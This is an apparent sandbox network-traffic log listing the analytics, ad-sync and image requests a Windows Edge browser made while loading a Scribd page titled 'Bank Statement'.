Source: global trafficHTTP traffic detected: POST /g/collect?v=2&tid=G-8KZ8BV0P5W&gtm=45je52d0v9101042369z878386455za200zb78386455&_p=1739863005904&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=102067808~102482433~102539968~102556565~102558064~102587591~102605417~102640600&cid=490258883.1739863012&ul=en-gb&sr=1280x1024&uaa=x86&uab=64&uafvl=Microsoft%2520Edge%3B117.0.2045.47%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&frm=0&pscdl=noapi&_s=1&sid=1739863011&sct=1&seg=0&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&dt=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&en=page_view&_fv=1&_nsi=1&_ss=1&tfd=8701 HTTP/1.1Host: analytics.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /g/collect?v=2&tid=G-Z4ZC50DED6&gtm=45je52d0v9101043253z878386455za200zb78386455&_p=1739863005904&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=102067808~102482432~102539968~102556566~102558064~102587591~102605417~102640600&cid=490258883.1739863012&ul=en-gb&sr=1280x1024&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Microsoft%2520Edge%3B117.0.2045.47%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&frm=0&pscdl=noapi&_eu=EA&_s=1&sid=1739863012&sct=1&seg=0&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&dt=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&en=page_view&_fv=1&_ss=1&tfd=8994 HTTP/1.1Host: analytics.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /s/c/a-05td?duid=4b59e25de34b--01jmbynct8prdw2s64049er0q5&euns=0&s=&version=v3.8.0&cd=.scribd.com&pv=70421afe-986b-44a4-9885-2988b048cebc HTTP/1.1Host: i.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /j?dtstmp=1739863012307&aid=a-05td&se=e30&duid=4b59e25de34b--01jmbynct8prdw2s64049er0q5&tv=v3.8.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&wpn=lc-bundle&wpv=v3.8.0&cd=.scribd.com&c=PHRpdGxlPkJhbmsgU3RhdGVtZW50IHwgUERGIHwgRGViaXQgQ2FyZCB8IEF1dG9tYXRlZCBUZWxsZXIgTWFjaGluZTwvdGl0bGU-PG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IkJhbmsgU3RhdGVtZW50IC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgcmVhZCBvbmxpbmUgZm9yIGZyZWUuICI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODA2ODM4NDQ1L0JhbmstU3RhdGVtZW50Ij48aDEgY2xhc3M9Il8zNWpvOW0iIGRhdGEtZTJlPSJkb2NfcGFnZV90aXRsZSI-PGRpdiBjbGFzcz0iXzJxczN0ZiB0aHNzTjEgVHJ1bmNhdGVkVGV4dC1tb2R1bGVfd3JhcHBlcl9mRzFLTTkiPjxwIGNsYXNzPSJUcnVuY2F0ZWRUZXh0LW1vZHVsZV9saW5lQ2xhbXBlZF84NXVsSEgiIHN0eWxlPSItLW1heC1saW5lczo1Ij5CYW5rIFN0YXRlbWVudDwvcD48L2Rpdj48L2gxPjxoMSBjbGFzcz0iXzM1am85bSIgZGF0YS1lMmU9ImRvY19wYWdlX3RpdGxlIj48ZGl2IGNsYXNzPSJfMnFzM3RmIFRydW5jYXRlZFRleHQtbW9kdWxlX3dyYXBwZXJfZkcxS005Ij48cCBjbGFzcz0iVHJ1bmNhdGVkVGV4dC1tb2R1bGVfbGluZUNsYW1wZWRfODV1bEhIIiBzdHlsZT0iLS1tYXgtbGluZXM6NSI-QmFuayBTdGF0ZW1lbnQ8L3A-PC9kaXY-PC9oMT48aDEgY2xhc3M9Il8zNWpvOW0iIGRhdGEtZTJlPSJkb2NfcGFnZV90aXRsZSI-PGRpdiBjbGFzcz0iXzJxczN0ZiBUcnVuY2F0ZWRUZXh0LW1vZHVsZV93cmFwcGVyX2ZHMUtNOSI-PHAgY2xhc3M9IlRydW5jYXRlZFRleHQtbW9kdWxlX2xpbmVDbGFtcGVkXzg1dWxISCIgc3R5bGU9Ii0tbWF4LWxpbmVzOjUiPkJhbmsgU3RhdGVtZW50PC9wPjwvZGl2PjwvaDE-&pv=70421afe-986b-44a4-9885-2988b048cebc HTTP/1.1Host: rp.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/681488845/149x198/c7ddc062e9/1716802451?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/706038976/149x198/b23f8188f7/1710539003?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/700745756/149x198/96c9d7ecea/1705973557?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/48495773/149x198/75bbdd6134/1387874969?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/624134665/149x198/f2a8b78d25/1675703756?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/684989787/149x198/3d21e84e60/1710549657?v=12 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /img/document/572094918/149x198/05a3fbea19/1716534898?v=12 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v2/sites/scribd-com/configs?env=PROD HTTP/1.1Host: d.pub.networkConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?redir=https://i.liadm.com/s/88342?bidder_id%3D246498%26bidder_uuid%3D$UID HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /r/dd/id/L21rdC8xOTcxL2NpZC8xNzQ5ODczMjc1L3QvMg/url/https://i.liadm.com/s/53233?bidder_id=183658&bidder_uuid=$!%7BTURN_UUID%7D HTTP/1.1Host: d.turn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /dis/usersync.aspx?r=77&p=311&cp=liveintent&cu=1&url=https://i.liadm.com/s/28292?bidder_id%3D71340%26bidder_uuid%3D@@CRITEO_USERID@@ HTTP/1.1Host: dis.criteo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /j?dtstmp=1739863012307&aid=a-05td&se=e30&duid=4b59e25de34b--01jmbynct8prdw2s64049er0q5&tv=v3.8.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&wpn=lc-bundle&wpv=v3.8.0&cd=.scribd.com&c=PHRpdGxlPkJhbmsgU3RhdGVtZW50IHwgUERGIHwgRGViaXQgQ2FyZCB8IEF1dG9tYXRlZCBUZWxsZXIgTWFjaGluZTwvdGl0bGU-PG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IkJhbmsgU3RhdGVtZW50IC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgcmVhZCBvbmxpbmUgZm9yIGZyZWUuICI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODA2ODM4NDQ1L0JhbmstU3RhdGVtZW50Ij48aDEgY2xhc3M9Il8zNWpvOW0iIGRhdGEtZTJlPSJkb2NfcGFnZV90aXRsZSI-PGRpdiBjbGFzcz0iXzJxczN0ZiB0aHNzTjEgVHJ1bmNhdGVkVGV4dC1tb2R1bGVfd3JhcHBlcl9mRzFLTTkiPjxwIGNsYXNzPSJUcnVuY2F0ZWRUZXh0LW1vZHVsZV9saW5lQ2xhbXBlZF84NXVsSEgiIHN0eWxlPSItLW1heC1saW5lczo1Ij5CYW5rIFN0YXRlbWVudDwvcD48L2Rpdj48L2gxPjxoMSBjbGFzcz0iXzM1am85bSIgZGF0YS1lMmU9ImRvY19wYWdlX3RpdGxlIj48ZGl2IGNsYXNzPSJfMnFzM3RmIFRydW5jYXRlZFRleHQtbW9kdWxlX3dyYXBwZXJfZkcxS005Ij48cCBjbGFzcz0iVHJ1bmNhdGVkVGV4dC1tb2R1bGVfbGluZUNsYW1wZWRfODV1bEhIIiBzdHlsZT0iLS1tYXgtbGluZXM6NSI-QmFuayBTdGF0ZW1lbnQ8L3A-PC9kaXY-PC9oMT48aDEgY2xhc3M9Il8zNWpvOW0iIGRhdGEtZTJlPSJkb2NfcGFnZV90aXRsZSI-PGRpdiBjbGFzcz0iXzJxczN0ZiBUcnVuY2F0ZWRUZXh0LW1vZHVsZV93cmFwcGVyX2ZHMUtNOSI-PHAgY2xhc3M9IlRydW5jYXRlZFRleHQtbW9kdWxlX2xpbmVDbGFtcGVkXzg1dWxISCIgc3R5bGU9Ii0tbWF4LWxpbmVzOjUiPkJhbmsgU3RhdGVtZW50PC9wPjwvZGl2PjwvaDE-&pv=70421afe-986b-44a4-9885-2988b048cebc&n3pc=true HTTP/1.1Host: rp.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync/liveintent/?cb=//i.liadm.com/s/35004?bidder_id%3D98254%26bidder_uuid%3D__ZUID__ HTTP/1.1Host: b1sync.zemanta.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?c=0aa2530f29e4f4a05b5d5d9bb35d60c2&p=93c1662463a616a7155169889dd99651&pid= HTTP/1.1Host: live.rezync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=liveintent&ttd_tpi=1&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?https://i.liadm.com/s/81081?bidder_id=91218&bidder_uuid=$UID&gdpr=0 HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /7.19.0/rewriteframes.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /i18n/pixel/static/identify_45dd5971.js HTTP/1.1Host: analytics.tiktok.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _ttp=2tCjaG9bXmYux1DJ121zI6Lcamx
Source: global trafficHTTP traffic detected: GET /images/555008.gif?tm=120&r=26903146&v=114&cs=UTF-8&h=www.scribd.com&l=en-GB&S=5e543256c480ac577d30f76f9120eb74&uu=7446882fe2154b73aae6f4638a84d92&t=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&u=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%20Edg%2F117.0.2045.47&nm=2&mh=63196a00446a1e285d1992cfe444aa55&np=5&ph=332b72bdb211e34e6e3c24f88d7c393b&sh=1024&sw=1280&cd=24&p=Win32&to=300&d=60&ce=true&tp=0&ol=true&pr=Gecko&ps=20030107&vd=Google%20Inc.&hc=4&je=false&ss=true&ls=true&in=true&db=false&tl=false&tr=false&ts=false&tb=false&ab=false&cf=a4e7cd73f0e94331f2ea39a4c659e628&fph=c0f48806e2dc75d6fcbd91de7957bb6f&fsh=1024&fsw=1280&fcd=24&fp=Win32&ftp=0&fhc=4&fss=true&fls=true&fin=true&fvch=418711b9360f0ff97a5476ce480683b2&fad=124.04347527516074&fdm=8&fvf=chrome&fcg=srgb&ffc=false&fm=0&fc=0&frm=false&fhdr=false&fmf=8a6484bc3146bfed2f1b37578b8d6f00&fa=255&fte=false&fts=false&fce=true&fpdf=true&fl=04e4adf37ffcbe95bf074adf5cbd1d1b&ft=America/New_York&pf=120&pfe=40&z=z HTTP/1.1Host: hexagon-analytics.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-GB%2Cen%2Cen-US%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=ae570e5b-7408-44c7-a275-b9d7e6499f48&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=57523e79-2d85-47d3-af35-a39e11e7d0a2&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1Host: analytics.twitter.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sp.pl?a=10000&d=Tue%2C%2018%20Feb%202025%2007%3A16%3A52%20GMT&n=5&b=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&.yp=10143699&f=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&enc=UTF-8&yv=1.16.6&tagmgr=gtm HTTP/1.1Host: sp.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
